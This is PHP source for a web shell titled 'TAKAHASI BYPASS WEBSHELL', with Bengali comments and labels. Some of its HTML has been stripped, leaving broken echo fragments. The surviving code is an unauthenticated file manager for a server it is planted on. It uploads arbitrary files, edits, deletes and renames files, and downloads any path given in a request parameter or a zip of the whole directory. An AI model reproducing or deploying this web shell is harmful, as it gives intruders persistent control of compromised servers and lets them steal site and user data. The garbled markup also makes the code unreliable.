TAKAHASI BYPASS WEBSHELL

বর্তমান পাথ:

ফাইলের তালিকা:

"; echo ""; echo ""; echo ""; echo ""; // পারমিশন দেখায় echo ""; echo ""; } } ?>
ফাইল নাম আকার পরিবর্তন পারমিশন অ্যাকশন
" . ($is_dir ? "" . $file . "" : $file) . "" . ($is_dir ? '-' : filesize($full_path) . " KB") . "" . date("F d Y H:i:s", filemtime($full_path)) . "" . substr(sprintf('%o', fileperms($full_path)), -4) . "

ফাইল আপলোড করুন:

নতুন ফাইল তৈরি করুন:

'; echo '

ফাইল এডিট করুন: ' . basename($file_to_edit) . '

'; echo '
'; echo ''; echo '
'; echo '
'; echo ''; } else { echo ""; } } // ফাইলের এডিট সেভ করার অংশ if (isset($_POST['save_edits'])) { $edited_content = $_POST['edited_content']; $file_to_edit = $_GET['edit']; if (file_exists($file_to_edit)) { file_put_contents($file_to_edit, $edited_content); echo ""; } else { echo ""; } } // ফাইল ডিলিট করা if (isset($_POST['delete'])) { $filename = $_POST['filename']; $file_to_delete = $current_dir . '/' . $filename; if (file_exists($file_to_delete)) { unlink($file_to_delete); echo ""; } else { echo ""; } } // ফাইল রিনেম করা if (isset($_POST['rename'])) { $oldname = $_POST['oldname']; $newname = $_POST['newname']; if (file_exists($current_dir . '/' . $oldname)) { rename($current_dir . '/' . $oldname, $current_dir . '/' . $newname); echo ""; } else { echo ""; } } // ফাইল আপলোড করা if (isset($_POST['upload'])) { $target_dir = $current_dir . "/"; $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]); if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo ""; } else { echo ""; } } // ফাইল ডাউনলোড করা (একটি ফাইল) if (isset($_GET['download'])) { $file_to_download = $_GET['download']; if (file_exists($file_to_download)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file_to_download) . '"'); header('Content-Length: ' . filesize($file_to_download)); readfile($file_to_download); exit; } else { echo ""; } } // সব ফাইল ডাউনলোড করা (ZIP) if (isset($_POST['download_all'])) { // ZIP ফাইলের নাম এবং অবস্থান $zip_file = 'all_files.zip'; // ZIP ক্লাস ব্যবহার করে ফাইল কম্প্রেস করা $zip = new ZipArchive(); if ($zip->open($zip_file, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) { // ডিরেক্টরির ফাইলগুলো লুপ করে ZIP এ যোগ করা $files = scandir($current_dir); foreach ($files as $file) { if ($file !== '.' && $file !== '..') { $file_path = $current_dir . '/' . $file; if (is_file($file_path)) { $zip->addFile($file_path, basename($file_path)); } } } $zip->close(); // ZIP ফাইল ডাউনলোড করা header('Content-Type: application/zip'); header('Content-Disposition: attachment; filename="' . basename($zip_file) . '"'); header('Content-Length: ' . filesize($zip_file)); flush(); readfile($zip_file); // ডাউনলোড শেষে ZIP ফাইল মুছে ফেলা unlink($zip_file); exit; } else { echo ""; } } ?>